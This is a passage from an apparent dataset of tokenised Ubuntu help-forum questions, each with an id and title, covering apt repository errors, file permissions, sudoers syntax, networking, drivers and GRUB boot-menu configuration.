translation-en_us ign http : //security.ubuntu.com oneiric-security/multiverse translation-en ign http : //security.ubuntu.com oneiric-security/restricted translation-en_us ign http : //security.ubuntu.com oneiric-security/restricted translation-en ign http : //security.ubuntu.com oneiric-security/universe translation-en_us ign http : //security.ubuntu.com oneiric-security/universe translation-en err http : //archive.ubuntu.com oneiric/main amd64 packages 404 not found err http : //archive.ubuntu.com oneiric/universe amd64 packages 404 not found err http : //archive.ubuntu.com oneiric/restricted amd64 packages 404 not found err http : //archive.ubuntu.com oneiric/multiverse amd64 packages 404 not found err http : //archive.ubuntu.com oneiric/main i386 packages 404 not found err http : //archive.ubuntu.com oneiric/universe i386 packages 404 not found err http : //archive.ubuntu.com oneiric/restricted i386 packages 404 not found err http : //archive.ubuntu.com oneiric/multiverse i386 packages 404 not found err http : //archive.ubuntu.com oneiric-updates/universe amd64 packages 404 not found err http : //archive.ubuntu.com oneiric-updates/main amd64 packages 404 not found err http : //archive.ubuntu.com oneiric-updates/restricted amd64 packages 404 not found err http : //archive.ubuntu.com oneiric-updates/multiverse amd64 packages 404 not found err http : //archive.ubuntu.com oneiric-updates/universe i386 packages 404 not found err http : //archive.ubuntu.com oneiric-updates/main i386 packages 404 not found err http : //archive.ubuntu.com oneiric-updates/restricted i386 packages 404 not found err http : //archive.ubuntu.com oneiric-updates/multiverse i386 packages 404 not found ign http : //archive.ubuntu.com oneiric/main translation-en_us ign http : //archive.ubuntu.com oneiric/main translation-en ign http : //archive.ubuntu.com oneiric/multiverse translation-en_us ign http : //archive.ubuntu.com oneiric/multiverse translation-en ign http : //archive.ubuntu.com oneiric/restricted translation-en_us ign http : //archive.ubuntu.com oneiric/restricted translation-en ign http : //archive.ubuntu.com oneiric/universe translation-en_us ign http : //archive.ubuntu.com oneiric/universe translation-en ign http : //archive.ubuntu.com oneiric-updates/main translation-en_us ign http : //archive.ubuntu.com oneiric-updates/main translation-en ign http : //archive.ubuntu.com oneiric-updates/multiverse translation-en_us ign http : //archive.ubuntu.com oneiric-updates/multiverse translation-en ign http : //archive.ubuntu.com oneiric-updates/restricted translation-en_us ign http : //archive.ubuntu.com oneiric-updates/restricted translation-en ign http : //archive.ubuntu.com oneiric-updates/universe translation-en_us ign http : //archive.ubuntu.com oneiric-updates/universe translation-en i can ping any computer and access internet . sudo apt-get update and apt-get upgrade does not work ( nor clean or autoclean ) , dpkg -- configure -a does not help also . any ideas ?
118198	why ca n't i get ubuntu to sync with ios 5.1 ?	i have an iphone and i want to switch completely to ubuntu . the problem is i ca n't get libmobile to work . it looks like it synced but the music or video does n't show up on the phone . i also ca n't use sbmanager . am i just a noob that ca n't figure this out ?
118199	how do i change file permissions on a fat32 drive ?	i have ubuntu 10.04 lts . i 've noticed recently every file in my hard drive get executable privilege even every text files so when open it a pop-up window asks me what to do ( run in terminal-display-cancel-run ) . i tried to change permission in terminal as sudo chmod a-x -rv /media/d/* it shows me that privilege has been changed as 666 which means rw-rw-rw but actually nothing has been done , it 's still as executable privilege given . i tried to move some files to desktop then did as above and it was successful . my hard drive is formatted as `` fat32 '' . what would be the problem ? ?
118204	sudoers - simple explanation requested	everytime i want to be able to run something that requires me to be a sudoer too many times , i need to google for the formatting of /etc/sudoers to remind me again what exactly is the proper way to write it . now i see different writing styles in my sudoers file , which is the consequence of different google results over the months . i 've also noticed that the second example ( below ) seems to work in xfce , but not in cinnamon ( gnome 3 ) . this could be totally unrelated , but nontheless i 'd like to know once and for all , what is the correct grammar of the sudoer line , and what is the difference between the given examples ? redsandro all=nopasswd : /path/to/command redsandro all= ( all ) nopasswd : /path/to/command redsandro all= ( all : all ) nopasswd : /path/to/command also , what are all the all 's for ? one user , one command , yet i need to use the all keyword up to three times ? am i doing this wrong ? of course , omitting nopasswd : makes you enter your password before you are permitted to run the command , but one point of confusion is the usage of = and : , for the final command that is the subject of the line can be prepended by either = , : , , or ) , confusing grammar for similar semantics .
118206	cheese wo n't start	i ca n't start cheese webcam booth . it starts loading and there is a brief moment when the window shows up but then it disappears , like it shuts itself down and it 's not in system monitor . my webcam works perfectly in skype video call . i installed and run camorama and it gave me an error : could not connect to video device ( /dev/video0 ) please check connection when i run the lsusb i get this line for my webcam : bus 002 device 002 : id 04f2 : b210 chicony electronics co. , ltd and for my graphic card , running lspci : vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) it 's not a pressing matter , but it bugs my nerves , if it works on skype , why does cheese and other programs refuse to run . as i said , it 's not a big deal but any help would be appreciated . running cheese in terminal : ( cheese:11454 ) : gtk-warning ** : attempting to add a widget with type gtkimage to a gtktogglebutton , but as a gtkbin subclass a gtktogglebutton can only contain one widget at a time ; it already contains a widget of type gtklabel ( cheese:11454 ) : gtk-warning ** : attempting to add a widget with type gtkimage to a gtktogglebutton , but as a gtkbin subclass a gtktogglebutton can only contain one widget at a time ; it already contains a widget of type gtklabel ( cheese:11454 ) : gtk-warning ** : attempting to add a widget with type gtkimage to a gtktogglebutton , but as a gtkbin subclass a gtktogglebutton can only contain one widget at a time ; it already contains a widget of type gtklabel ( cheese:11454 ) : gtk-warning ** : attempting to add a widget with type gtkhbox to a gtkbutton , but as a gtkbin subclass a gtkbutton can only contain one widget at a time ; it already contains a widget of type gtklabel ( cheese:11454 ) : gtk-warning ** : attempting to add a widget with type gtkimage to a gtkbutton , but as a gtkbin subclass a gtkbutton can only contain one widget at a time ; it already contains a widget of type gtklabel ( cheese:11454 ) : gtk-warning ** : attempting to add a widget with type gtkhbox to a gtktogglebutton , but as a gtkbin subclass a gtktogglebutton can only contain one widget at a time ; it already contains a widget of type gtklabel ( cheese:11454 ) : gtk-warning ** : attempting to add a widget with type gtkimage to a gtkbutton , but as a gtkbin subclass a gtkbutton can only contain one widget at a time ; it already contains a widget of type gtklabel ( cheese:11454 ) : gdk-warning ** : the program 'cheese ' received an x window system error . this probably reflects a bug in the program . the error was 'baddrawable ( invalid pixmap or window parameter ) ' . ( details : serial 932 error_code 9 request_code 137 minor_code 9 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . )
118210	ubuntu 12.04 64 bit ram usage	i 'm looking forward to download ubuntu 12.04 . but which bit version will fit best on my computer ? . intel pentium 4 3.06 1mb cache lga , asus p5pe-vm motherboard , 1gb ram ( 512+512 ) nvidia geforce 6200 128mb agp graphics card . will i run out of ram ? or is it good to use 32bit more than using 64 bit on this ? this computer fully supports windows 7 64bit edition and runs better than 32bit . i 'm currently using ubuntu 10.10 32bit and it runs like a dream ( 11.10 is much slower on this pc ) please help me before 26th of april !
118215	how do install 32 bit firefox alongside 64 bit firefox on 64 bit 11.10 machine ?	need to run webex audio/video . am running the sun version of java , but apparently the webex plugins will not work on 64 bit . another member posted info on how to use 32 bit plugin , but i 'd rather not muck with my good working install . i 'd be ok with running a different browser only when i need webex . i am currently using firefox 11 ( 64 bit ) and chromium 17.0 ( 64 bit ) . can anyone point me towards how i would install firefox 32 alongside 64 , or chrome ( 32 bit ) alongside chromium ( 64 bit ) ... or some other 32-bit browser variant that would allonw webex audio/video to work alongside my current setup..
118223	how to clean/repair ubuntu 12.04 when the stable comes out ?	i 've upgraded to ubuntu precise ( 12.04 ) beta 1 and a lot of things are broken , i 'm working my way around most issues and reporting the bugs . i just wanted to know if there 's a way do repair the whole system ( like reinstalling every package ) when the stable version comes out.. without reinstalling the os . all i want is to have the `` fresh install '' stability after the final 12.04 comes out .
118226	what program can i use to open an .itf file ? ( interlace file )	after looking around for a couple hours , i can only find that files with this extension are associated with jpi topspeed pascal . the files were generated by a cable tester and i have no idea what the model number of said tester is . essentially , i was given a number of files by someone at work and asked , `` how do i open these ? '' any help is much appreciated . thanks , all .
118240	set target disk and reboot remotely	i want to be able to set my target disk and reboot in windows remotely , can this be done ? i have ssh set up and am able to log in from outside of my network .
118241	where is the username and password stored	just for my curiosity , where is the username and associated password is stored in ubuntu ? and how it is verified at the login time ?
118248	can not update repository due to 403 error	trying to update 11.04 to 11.10 , i get this : failed to fetch http : //pt.archive.ubuntu.com/ubuntu/pool/universe/g/gmp4/libgmp3c2_4.3.2+dfsg-2ubuntu1_amd64.deb 403 forbidden going to the url in the browser , i see that `` gmp4 '' seems to be empty , trying the same url for es.archive.ubuntu ( for example ) has no problem . any ideas ? [ ] , kharys
118250	hulu desktop stopped working on my dell	after last weeks flash update hulu desktop no longer works on my dell laptop though it still works on my hp desktop . here 's what cli tells me on the dell : inspiron-1564 : ~ $ huludesktop failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory i tried : sudo apt-get install libvdpau_nvidia.so but got e : unable to locate package libvdpau_nvidia.so and e : could n't find any package by regex 'libvdpau_nvidia.so' hulu does work through the browser and through xbmc . xbmc just does n't seem to match the video quality of the hulu desktop . i do n't really know why a nvidia.so is needed for my intel graphics that comes on dell insiron 1564 's . anyway . so , do you guys have a solution ?
118251	what keys can i use to navigate unity greeter with a keyboard ?	i have a media center with a keyboard but no mouse . is there a way i can navigate the unity greeter with a keyboard so i can change the session i log into , etc . ?
118253	super + d broken	ubuntu 11.10 . the super + d stopped minimizing all windows . the combination does nothing . it worked a couple of days ago as i was using it a lot . any ideas ? thanks , bob .
118255	how do i create a ubuntu script file that will open a .jar file ?	how do i create a ubuntu terminal script that will open a .jar file ? this is what i have tried until now : java -jar `` /home/my-name/desktop/slow but accurate/bulknamechecker-slowbutaccurate.jar '' but it returns error : unable to access jarfile /home/my-name/desktop/slow but accurate/bulknamechecker-slowbutaccurate.jar
118261	keyring no longer prompts for password when ssh-ing	i remember that i used to be able to do ssh blah @ foo.com and have a prompt asks me for a password to unlock the keyring for the whole gnome session so subsequent ssh would n't need to enter the keyring password any longer ( not quite sure if this is in ubuntu or other distro ) . but nowadays doing ssh blah @ foo.com would ask me , in the terminal , my keyring password every single time ; which defeats the purpose of using ssh keys . i checked $ cat /etc/pam.d/lightdm | grep keyring auth optional pam_gnome_keyring.so session optional pam_gnome_keyring.so auto_start which looks fine , and $ pgrep keyring 1784 gnome-keyring-d so the keyring daemon is alive . i finally found that ssh_auth_sock variable ( and gnome_keyring_control and gpg_agent_info and gnome_keyring_pid ) are not being set properly . what is the proper way to set this variable and why are n't they being set in my environment ( i.e . should n't they be set in default install ) ? i guess i can set it in .bashrc , but then the variables would only be defined in bash session , while that is fine for ssh , i believe the other environment variables are necessary for gui apps to use keyring .
118263	some programs not found when used with sudo	i just installed go to /usr/local/go , and in ~/.bashrc added this line : export path= $ path : /usr/local/go/bin now go works from the command line , but sudo go gives me : $ sudo go sudo : go : command not found ~ $ sudo echo $ path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /home/benjamin/algs4/bin : /usr/local/go/bin
118268	how to properly install skype on 11.10 64bit	i wanted to install skype on my fresh ubuntu 11.10 . i 'm running on a 64 bit machine . when i go to the software center i only find skype : i386 but twice . when i try to install it , the software center tells me that in order to install skype the libary libc-bin has to be removed . i do n't think this is what i want . is there any workaround to get skype running on my machine ? thanks in advance .
118269	where can i find italc2 packages ?	i checked from packages and i se , that even ubuntu 12.04 contains old version even italc2 has been released already half year ago ... is there any hope , that it will be renewed ?
118273	what are icmp redirects and should they be blocked ?	after enabling ufw and the tiger security auditor , i see warnings saying : the system accepts icmp redirection messages what are icmp redirection messages ? should they be disabled for security purposes ? if so , what is the right way to do that using the ufw firewall ?
118283	change mouse wheel scroll speed in chrome on 12.04 ( edit starter bar commandline )	i want to increase the mouse wheel scroll speed in google chrome on ubuntu 12.04 . i 've read how can i change the mouse 's wheel scroll rate ? , i 'm on unity though , how can i edit the commandline for the chrome icon in the starter bar ?
118290	setup for dual disk ( ssd+hdd ) with /home partition	i 'm going to move from hdd to ssd ( 60gb ) + hdd ( 250gb ) setup . basicly i want the system to be fast . root partition will be on ssd but i 'm not sure what to do with /home . all data like /pictures /documents will be linked to hdd that will be in a removable caddy adapter in my thinkpad . from time to time i might need to remove it and plug in a cd-rom . this way i guess some part of /home partition will have to be on ssd to make the system bootable . does anyone has some tips ? it 's also important that the eclipse and browsers ( opera , firefox ) will run fast . is it also enough to just copy the partition to ssd to i will have to make a clean install ?
118291	ubuntu kvm networking	i have two vms ( linux based vm ) running on a ubuntu/qemu kvm . i am looking at a simple networking model , where in the vms have public address and need to talk to the outside world and the outside world should be able to talk to the vms as well . i did this created a bridge with a.b.c.d/16 ( class b address ) eth2 is part of the brige with a.b.c.e /32 host address vm 's interface ( through tap ) has a.b.c.f / 16 address eth2 and vm interface are both part of the bridge . now however , i am unable to ping these address from the outside world . if i remove eth2 from the bridge , i am able to ping the eth2 . please let me know what is going on . guest
118292	is ubuntu security enough ?	i work with sensible data , so i need a reasonable level of security and use ubuntu as main operative system in a professional activity . i have developed a php platform that performs some sensible operations with aes and rsa , so i need to have a local web server . does it break system security ? which fixes may i apply ? and , more in general , are ubuntu default setting safe enough ?
118293	bug report invalid , unupdated packages	i tried reporting a bug to launchpad , and it faulted with please upgrade your system to the latest package versions i have downloaded ubuntu 12.04 beta 2 ten minutes before i tried to report the bug . how can it was possible ? what do i need to do now ?
118299	kernel panic- not syncing : attempted to kill init !	i am not very technical . my system has frozen 3 times in march -- - this is what was on screen ... ubuntu 10.04.4 lts admin.sybalsky.com tty1 admin.sybalsky.com login : [ 683454.747106 ] kernel panic- not syncing : attempted to kill init ! i know the system is running : linux admin.sybalsky.com 2.6.32-40-generic-pae # 87-ubuntu smp mon mar 5 21:44:34 utc 2012 i686 gnu/linux ubuntu 10.04.4 lts can you tell me what this all means and why it is happening and what can i do about it ?
118300	increase size of root partition after installing ubuntu in windows	every time update manager prompts an update i get a message saying that there is not enough space available , however the partition with ubuntu installed has over 10 gb of free space available . i 'm lost as to what needs to be done . df -h returns : filesystem size used avail use % mounted on /dev/loop0 5.6g 5.1g 237m 96 % / udev 2.0g 4.0k 2.0g 1 % /dev tmpfs 786m 792k 786m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 332k 2.0g 1 % /run/shm /dev/sda6 20g 6.7g 13g 34 % /host /dev/sda5 175g 120g 56g 69 % /media/data it would be great if someone could help me out on how to solve this problem . i 'm a newbie to ubuntu .
118305	how to speedup ubuntu when user home directory on nis/nfs ?	i discovered that ubuntu 11.04 is kinda slow when you have your home directory on nfs , even when nis itself does n't have any performence issues . still it seems that many applications including eclipse or chrome are slow and i 'm sure the cause is the nis home directory . how can i configure the system so it will behave decent . in 99 % of the time having home directory on nis/nfs is not so important in my case so i 'm looking for alternatives .
118312	creating custom command	i 'm a web developer . when i want to start working , always i 'm executing some command on terminal . for example : sudo service apache2 start sudo service mysql start sublime for speed up this process , i create a .sh file which contain these commands . now , when i want to start working , i 'm just executing this .sh file and all services ( mysql , apache2 etc . ) starting . is it possible to create a custom command for this ? for example if i type sudo start-working to terminal , it will execute these commands
118318	faster wine application opening	[ translation ] i want to open a game ( killing floor ) which in windows opens very fast but when i try to the same in ubuntu i find it slow . is there a way of opening .exe files in ubuntu faster using more ram or any other tricks ? i am using ubuntu 12.04 . [ original ] bueno mi duda es que quiero abrir un juego ( killing floor ) el cual es un exe que en windows me va bastante rapido , sin embargo al abrirlo desde ubuntu me va lento , 多hay alguna manera de abrir archivos exe con mas ram o algo que haga que vaya rapido ? gracias . uso ubuntu 12.04 lts
118326	is there a way of grouping multiple windows in a single window ?	since i use xmonad as my window manager , i 've found the application terminator ( which allows a single application window to be split into multiple terminal emulators ) to be extremely useful since it allows me to have a tiled terminal application open in a tabbed environment . is it possible to 'wrap ' multiple applications into a single window , much as terminator does with its terminal windows ?
118327	hp dl360 g4 screen resolution problem	i just bought an old blade server to mess about with at home and cant get the thing to work . i have run the installer 11.10 x64 server and that was fine . after installing and rebooting , post is fine but when grub kicks in the screen shows a popup type box complaining that it cant use the resolution . i have tried different screens and its always the same . i can reboot and go back into the installer and the screen is fine . i tried to follow some guides on-line about changing the resolution but i cant get a terminal . i found one in the installer but that is using the ram as / . the installer says 'the drive is mounted as `` /target '' ' but i do n't see that , nor /mnt/target . could anyone help me configure this and get it running . thanks .
118332	unity launcher full - need more icons	i have already reduced the unity launcher icons to 32 but still the space is exhausted already with my most-used programs . basically i have to scroll often in the unity launcher bar with is annoying . so far ( ubuntu 10.04 ) i had those icons as mini ones in the top panel ( smaller icons and wider space ) where they could fit all . i was thinking already of sub-launchers or something the like but could not find something like the drawer was in gnome 2 . i am using ubuntu at home and in the office . i am a consultant and need a lot of stuff on a regular basis . to put links at the desktop does not make sense because of the many windows that i usually have open there is hardly ever a piece of the desktop looking through . how do you - power users get keep most-used programs at reach ( and i mean < = 2 clicks away ) ?
118334	cant install software	so i just installed the ubuntu 11.10 .. and when i goto software center and try to download any software ( use source ) .. all i get is a window saying that `` failed to download repository information '' , `` check your internet connection '' and w : failed to fetch bzip2 : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric_restricted_binary-i386_packages hash sum mismatch , w : failed to fetch bzip2 : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric_universe_binary-i386_packages hash sum mismatch , w : failed to fetch bzip2 : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric_multiverse_binary-i386_packages hash sum mismatch , w : failed to fetch htt p : //archive.ubuntu.com/ubuntu/dists/oneiric/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric_main_i18n_index , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/oneiric/multiverse/i18n/index no hash entry in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric_multiverse_i18n_index , w : failed to fetch htt : //archive.ubuntu.com/ubuntu/dists/oneiric/restricted/i18n/index no hash entry in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric_restricted_i18n_index , w : failed to fetch ht tp : //archive.ubuntu.com/ubuntu/dists/oneiric/universe/i18n/index no hash entry in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric_universe_i18n_index , w : failed to fetch bzip2 : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-updates_main_source_sources hash sum mismatch , w : failed to fetch bzip2 : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-updates_restricted_binary-i386_packages hash sum mismatch , w : failed to fetch bzip2 : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-updates_universe_binary-i386_packages hash sum mismatch , w : failed to fetch bzip2 : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-updates_multiverse_binary-i386_packages hash sum mismatch , w : failed to fetch h tp : //archive.ubuntu.com/ubuntu/dists/oneiric-updates/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-updates_main_i18n_index , w : failed to fetch h ttp : //archive.ubuntu.com/ubuntu/dists/oneiric-updates/multiverse/i18n/index no hash entry in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-updates_multiverse_i18n_index , w : failed to fetch ht tp : //archive.ubuntu.com/ubuntu/dists/oneiric-updates/restricted/i18n/index no hash entry in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-updates_restricted_i18n_index , w : failed to fetch htt p : //archive.ubuntu.com/ubuntu/dists/oneiric-updates/universe/i18n/index no hash entry in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-updates_universe_i18n_index , w : failed to fetch bzip2 : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-backports_main_source_sources hash sum mismatch , w : failed to fetch bzip2 : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-backports_restricted_binary-i386_packages hash sum mismatch , w : failed to fetch bzip2 : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-backports_universe_binary-i386_packages hash sum mismatch , w : failed to fetch bzip2 : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-backports_multiverse_binary-i386_packages hash sum mismatch , w : failed to fetch h ttp : //archive.ubuntu.com/ubuntu/dists/oneiric-backports/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-backports_main_i18n_index , w : failed to fetch h ttp : //archive.ubuntu.com/ubuntu/dists/oneiric-backports/multiverse/i18n/index no hash entry in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-backports_multiverse_i18n_index , w : failed to fetch ht tp : //archive.ubuntu.com/ubuntu/dists/oneiric-backports/restricted/i18n/index no hash entry in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-backports_restricted_i18n_index , w : failed to fetch ht tp : //archive.ubuntu.com/ubuntu/dists/oneiric-backports/universe/i18n/index no hash entry in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-backports_universe_i18n_index , w : failed to fetch bzip2 : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-security_main_source_sources hash sum mismatch , e : some index files failed to download . they have been ignored , or old ones used instead . '' neglect the http typos , its to evade the 2 hyperlink.. i tried making a file in the apt.conf.d folder also , and added proxy entries , also set the system proxy.. and also the `` network proxy '' , but nothing works.. and now i cant install any software ! ! help needed
118342	change default binaries for texlive	ubuntu ships with texlive 2009 , which installs the tex binaries into /usr/bin/latex i 've installed the current version of texlive with its installer , which installs its binaries into /usr/local/texlive/2011/bin/i386-linux/ . i 've added it to my path ( along with the man and info pages , using my .bashrc : manpath= $ manpath : /usr/local/texlive/2011/texmf/doc/man export manpath infopath= $ infopath : /usr/local/texlive/2011/texmf/doc/info export infopath path= $ path : /usr/local/texlive/2011/bin/i386-linux export path but latex , tex , etc still run the old versions ; which latex returns /usr/bin/latex . what is the recommended way to get my system to default to the new binaries , man files , etc ? ( seems this should be possible without remapping each binary by hand or replacing the old ones ? ) many thanks .
118345	how to un-fullscreen an application on your secondary monitor in 11.10	nvidia twinview was n't working for me very well so i uninstalled it and started using the nouveau driver , since then my dual monitors are working properly . with 11.10 the panel has changed . it appears on my main monitor only , along with the unity bar . when i have an application full screened the panel acts as the file menu , along with max , min , and close options . however i 'm noticing when i have something full screened on my secondary monitor ( where there is no panel ) i have no way of un-fullscreening it . the panel on the main monitor do not show any options when that window is selected . this is okay for some apps like my web browser that has these buttons in it anyway , but i fullscreened banshee and now it 's stuck there ... any idea on how to un-fullscreen something in this situation ?
118346	firefox does n't display website text	firefox 11 does n't show any text on some sites as google and youtube . also lotus symphony does n't show many ui labels . this problem occurred suddenly . firefox display error : symphony display error :
118350	multi subnet in ubuntu with dnsmasq	i have a multi lan port box that install ubuntu server 11.10 . i am setup network in /etc/network/interfaces file as follow : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.128.254 netmask 255.255.255.0 network 192.168.128.0 broadcast 192.168.128.255 gateway 192.168.128.1 dns-nameservers xxxxxx auto eth1 iface eth1 inet static address 192.168.11.1 netmask 255.255.255.0 network 192.168.11.0 broadcast 192.168.11.255 auto eth2 iface eth2 inet static address 192.168.21.1 netmask 255.255.255.0 network 192.168.21.0 broadcast 192.168.21.255 auto eth3 iface eth3 inet static address 192.168.31.1 netmask 255.255.255.0 network 192.168.31.0 broadcast 192.168.31.255 i am also enable the ip forward by echo 1 > /proc/sys/net/ipv4/if_forward in rc.local . my dnsmasq config as follow except-interface=eth0 dhcp-range=interface : eth1 , set : wifi,192.168.11.101,192.168.11.200,255.255.255.0 dhcp-range=interface : eth2 , set : kids,192.168.21.101,192.168.21.200,255.255.255.0 dhcp-range=interface : eth3 , set : game,192.168.31.101,192.168.31.200,255.255.255.0 the dhcp was working fine in eth1 , eth2 , eth3 , any machine plug in the subnet can get correct subnet 's ip . my problem was , each subnet machine ca n't ping each other . for example . 192.168.11.101 ca n't ping 192.168.21.101 but can ping 192.168.128.1 192.168.31.101 ca n't ping 192.168.21.101 but can ping 192.168.128.1 i am also try to using route add -net 192.168.11.0 netmask 255.255.255.0 gw 192.168.11.1 ( and also 192.168.21.0/192.168.31.0 ) at this multi-lan-port machine . but still wo n't work . does anyone can help ? thanks .
118354	launching transmission/dropbox behind a xbmc desktop session	i am trying to get my htpc set up just how i like it . i have transmission scanning dropbox for new torrents , and xbmc handling playback . i want to use xbmc as the desktop session , to speed up launch . how can i make sure transmission and dropbox are both launched and functioning behind xbmc ?
118357	how to change web browser 's tab bar background color or image ?	running precise . i am tweaking the ambiance theme to my taste . yet i ca n't locate where i can modify the background color of the browser 's tab bar ( i suspect its value instruction to be somewhere in the gtk-widget or gtk-3 style files ) . see image : thanks in advance . -- -- -- -- -- -- -- -- -- -edit -- -- -- -- -- -- -- -- -- -- -- - solution : edited the following files : /usr/share/themes/mytheme/gtk-2.0/apps/chromium.rc ( style `` chrome-gtk-frame '' { ... } ) gtk.css gtkrc ( gtk-2.0 folder / first line of style dark - background - ) : style `` dark '' { color [ `` bg_color_dark '' ] = `` # 303030 '' # original was 3c3b37 color [ `` fg_color_dark '' ] = `` # dfdbd2 '' color [ `` selected_fg_color_dark '' ] = `` # ffffff '' fg [ normal ] = @ fg_color_dark fg [ prelight ] = shade ( 1.15 , @ fg_color_dark ) fg [ active ] = @ fg_color_dark fg [ selected ] = @ selected_fg_color_dark fg [ insensitive ] = shade ( 0.5 , @ fg_color_dark ) bg [ normal ] = @ bg_color_dark bg [ active ] = shade ( 0.8 , @ bg_color_dark ) bg [ selected ] = @ selected_bg_color bg [ prelight ] = shade ( 1.0 , `` # 4d4c48 '' ) bg [ insensitive ] = shade ( 0.85 , @ bg_color_dark ) text [ normal ] = @ fg_color_dark text [ prelight ] = shade ( 1.15 , @ fg_color_dark ) text [ selected ] = @ selected_fg_color_dark text [ active ] = @ fg_color_dark text [ insensitive ] = mix ( 0.5 , @ bg_color , @ bg_color_dark ) } result :
118362	how do i get the touchpad working on a dell inspirion duo ?	i installed 12.04 version of ubuntu on my dell inspiron duo . after installing with help of program like unetbootin or smth like that . after that i followed with steps from here , in the first post here : http : //ubuntuforums.org/showthread.php ? t=1658635 there left one big problem with touchscreen : when i whant to drag with touchscreen like i 'm doing it with mouse ( for ex . selecting multile files with mouse ) the selectable rectangle does not shows while i 'm dragging , when dragging was finished ( i take my finger off ) it shows the rectangular and hides it . this thing disables all my tries to drag a window or smth else ... . also some time after using touchscreen such things are disabeling : - often - click from a mouse ( after keyboard using functinality restores ) - less often - mouse movement disables ( sometimes restores sometimes not ) - lesser than other - keyboards works but no sygnals accepting ( keyoards has indicator , so thay react , mouse of course not ) the test from etouchu utility passes perfectly . any idea for solving this problem ? i would also like to know how to to configure rotating the screen .
118368	how do i upload videos using the ubuntu one apps ?	love the app for my android phone and ipad . i take a picture , it 's on my pc and laptop . brilliant . only problem is that this does n't work for videos . is this a known issue with the ubuntuone app ? if so , when can i expect to upload videos from my android phone and ipad . the ipad dropbox app can do videos and that 's the only reason that i still use it . excellent work so far , please please please fix video uploads
118371	how can i build a link for a directory aside from one file ?	i run world of warcraft on windows 7 on one hard drive and ubuntu on another . until i can figure out how to get my wine version working at the same framerate as the windows 7 version , i have to do large group content on my windows installation . i have two copies of the installation . as of now , i link the directories inside of the primary folder in the wine installation ( i.e . the interface folder is a symlink pointing to the windows 7 installation folder ) . the reason i link the subdirectories instead of the main directory is because , 2 directories deep ( /wow/wtf/config.wtf ) , there is a configuration file that i keep different for both installations . while this is pretty much okay , it means i will run into issues when i get either installation patched as the root installation folder has executable files . is there a way to build a symlink , but allow a file inside of the symlink to remain unlinked ? or , alternatively , is it safe to link *.exe files that i know will be altered / patched ?
118372	enable grub boot menu on new system	i have installed ubuntu 11.04 and i would like to see the boot menu when the system starts ( by default it is hidden or the timeout=0 ) # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 44f311b4-0b40-4d10-b004-78108539fc39 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm fi terminal_output gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 44f311b4-0b40-4d10-b004-78108539fc39 set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 44f311b4-0b40-4d10-b004-78108539fc39 insmod jpeg if background_image /boot/grub/boot.jpg ; then true else set menu_color_normal=white/black set menu_color_highlight=black/light-gray fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # 